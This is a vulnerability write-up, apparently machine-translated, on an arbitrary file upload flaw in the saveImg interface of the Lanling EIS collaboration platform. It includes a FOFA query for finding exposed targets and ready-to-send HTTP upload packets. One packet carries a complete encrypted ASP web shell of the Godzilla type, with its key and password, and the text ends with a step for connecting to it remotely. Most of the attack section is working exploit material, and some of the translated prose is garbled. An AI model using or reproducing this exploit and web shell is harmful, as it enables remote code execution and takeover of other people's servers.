There is an arbitrary file upload vulnerability in the saveImg interface of Lanling EIS smart collaboration platform

Disclaimer: Please do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article will be the responsibility of the user himself. All consequences incurred Adverse consequences have nothing to do with the author of the article. This article is for educational purposes only.

1. Introduction to Lanling EIS

Lanling Smart Collaboration Platform eis integrates a very rich module to meet the needs of organizations and enterprises in knowledge, collaboration, project management system construction, etc.

2. Vulnerability description

Lanling Intelligent Collaboration Platform EIS integrates a very rich module to meet the needs of organizations and enterprises in knowledge, collaboration, project management system construction and other needs. There is an arbitrary file upload vulnerability in the platform's saveImg interface, through which weshell can be uploaded.

3. Affected versions

Lanling Intelligent Collaboration Platform EIS

4. fofa query statement

icon_hash=“953405444”

5. Recurrence of vulnerabilities

Vulnerability link: http://127.0.0.1/eis/service/api.aspx?action=saveImg

Vulnerability packet:

POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Length: 179
Content-Type: multipart/form-data; boundary=25c172e79b2758a7d7ff9fe9cab4a76d

--25c172e79b2758a7d7ff9fe9cab4a76d
Content-Disposition: form-data; name="file"; filename="50514.asp"
Content-Type: text/html

578321995
--25c172e79b2758a7d7ff9fe9cab4a76d--

After sending the vulnerability data packet, the uploaded path will be returned.

Spliced ​​uploaded file path: http://127.0.0.1/files/editor_img/20231019212439970030/20231019212439970030.asp

burp package

POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=25c172e79b2758a7d7ff9fe9cab4a76d
Content-Length: 1950

--25c172e79b2758a7d7ff9fe9cab4a76d
Content-Disposition: form-data; name="file"; filename="50514.asp"
Content-Type: text/html

<%
Set bypassDictionary = Server.CreateObject("Scripting.Dictionary")

Function Base64Decode(ByVal vCode)
    Dim oXML, oNode
    Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
    Set oNode = oXML.CreateElement("base64")
    oNode.dataType = "bin.base64"
    oNode.text = vCode
    Base64Decode = oNode.nodeTypedValue
    Set oNode = Nothing
    Set oXML = Nothing
End Function

Function decryption(content,isBin)
    dim size,i,result,keySize
    keySize = len(key)
    Set BinaryStream = CreateObject("ADODB.Stream")
    BinaryStream.CharSet = "iso-8859-1"
    BinaryStream.Type = 2
    BinaryStream.Open
    if IsArray(content) then
        size=UBound(content)+1
        For i=1 To size
            BinaryStream.WriteText chrw(ascb(midb(content,i,1)) Xor Asc(Mid(key,(i mod keySize)+1,1)))
        Next
    end if
    BinaryStream.Position = 0
    if isBin then
        BinaryStream.Type = 1
        decryption=BinaryStream.Read()
    else
        decryption=BinaryStream.ReadText()
    end if

End Function
    key="3c6e0b8a9c15224a"
    content=request.Form("123456")
    if not IsEmpty(content) then

        if  IsEmpty(Session("payload")) then
            content=decryption(Base64Decode(content),false)
            Session("payload")=content
            response.End
        else
            content=decryption(Base64Decode(content),true)
            bypassDictionary.Add "payload",Session("payload")
            Execute(bypassDictionary("payload"))
            result=run(content)
            response.Write("ca0be7")
            if not IsEmpty(result) then
                response.Write Base64Encode(decryption(result,true))
            end if
            response.Write("2d6353")
        end if
    end if
%>
--25c172e79b2758a7d7ff9fe9cab4a76d--

6. Deep recurrence

1. Send like flowers

2. Godzilla direct connection